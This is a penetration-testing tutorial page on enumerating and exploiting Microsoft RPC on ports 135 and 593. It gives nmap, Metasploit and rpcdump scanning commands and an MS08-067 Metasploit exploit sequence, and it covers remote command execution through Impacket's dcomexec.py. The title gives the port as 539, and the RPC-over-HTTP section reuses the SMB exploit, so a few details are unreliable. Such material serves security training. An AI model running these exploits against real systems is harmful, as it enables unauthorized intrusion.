# MSRPC - Port 135, 539 {% tabs %} {% tab title="Support VeryLazyTech πŸŽ‰" %} Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š {% endtab %} {% endtabs %} ## Basic info The **Microsoft Remote Procedure Call (MSRPC)** protocol is a powerful client-server model enabling one system to request services from another over a network, forming the backbone of many Windows-based network services. Initially derived from open-source software, it was later developed and patented by Microsoft. Exposing MSRPC services, especially on **Port 135** (RPC) and **Port 593** (RPC over HTTP), creates significant vulnerabilities that penetration testers can exploit for remote code execution, privilege escalation, and lateral movement. MSRPC allows a program to request a service from a program located on another computer in a network, abstracting the underlying network protocols and allowing cross-platform communication. MSRPC is accessed via various ports, the most common being **Port 135 (TCP/UDP)** for RPC services, **Port 593 (TCP)** for RPC over HTTP, and **Ports 139/445 (SMB)** for SMB-based RPC. **Key Details:** * **Port 135 (TCP/UDP)**: The RPC endpoint mapper listens on this port, which acts as the entry point for locating other RPC services on a system. * **Port 593 (TCP)**: Used for RPC over HTTP, enabling RPC traffic to bypass network firewalls and proxies. * **Ports 139/445 (TCP)**: These ports are primarily used by SMB for MSRPC communication. ## **How MSRPC Works** The process begins when a **client application** initiates the request for an RPC service. Here's how it works: * **Client Stub**: The client invokes a local procedure call (stub). * **Runtime Library**: The stub works with the client runtime library to convert the parameters into a standardized format (Network Data Representation). * **Communication**: If the server is remote, the runtime library determines the transport protocol (e.g., TCP, HTTP) and sends the request over the network. The communication is usually secured via **authentication mechanisms** like NTLM or Kerberos, though these can be bypassed or exploited if misconfigured. ## **Identifying Exposed RPC Services** Exposing RPC services over the network can be an attack vector if not properly secured. **Identifying exposed RPC services** is the first step in a pentesting assessment. You can use several tools to discover these services across different ports. **Tools for Scanning RPC Services:** **Nmap**: ```bash nmap -p 135,593 -sV ``` **Metasploit:** ``` use auxiliary/scanner/dcerpc/endpoint_mapper use auxiliary/scanner/dcerpc/hidden use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor rpcdump.py -p 135 ``` **rpcdump**: ```bash rpcdump -p 135 ``` **Example output from rpcdump:** ```makefile D:\rpctools> rpcdump [-p port] IFID: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0 Annotation: Messenger Service UUID: 00000000-0000-0000-0000-000000000000 Binding: ncadg_ip_udp:[1028] ``` The `rpcdump` utility will show **Interface Identifiers (IFID)** like the **LSA** and **SAMR interfaces**, which can be exploited for user enumeration, password cracking, and privilege escalation. **Common RPC Interfaces:** * **IFID: 12345778-1234-abcd-ef00-0123456789ab**: LSA Interface (used for enumerating users). * **IFID: 3919286a-b10c-11d0-9ba8-00c04fd92ef5**: LSA Directory Services (enumerates domains). * **IFID: 12345778-1234-abcd-ef00-0123456789ac**: SAMR Interface (used for password brute-forcing). ## **Executing Remote Code Execution (RCE) with Valid Credentials** Once you've identified the target system with valid credentials, it’s time to exploit the RPC service for Remote Code Execution (RCE). Common vulnerabilities like **MS08-067** (RCE through NetAPI) allow attackers to execute code remotely. **Exploitation Techniques:** * **Metasploit**: Exploits such as MS08-067 can be used to execute arbitrary code on vulnerable machines. ```bash msfconsole use exploit/windows/smb/ms08_067_netapi set RHOST run ``` * **Impacket Framework**: Tools like `dcomexec.py` can execute commands remotely once you have valid credentials. ```bash python dcomexec.py DOMAIN/username:password@ ``` ## **RPC Over HTTP (Port 593)** Port 593 is used for **RPC over HTTP**, which encapsulates RPC traffic in HTTP requests, allowing it to bypass firewalls and proxies that may block traditional RPC traffic on Port 135. Identifying and exploiting this port requires special tools and techniques. **rpcdump**: Can be used to identify services running on Port 593. ```bash rpcdump -p 593 ``` **Metasploit and Impacket**: ```bash use exploit/windows/smb/ms08_067_netapi set RHOST run ``` {% hint style="success" %} Learn & practice [**For the OSCP.**](https://shop.verylazytech.com/)
Support VeryLazyTech πŸŽ‰ Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š
{% endhint %}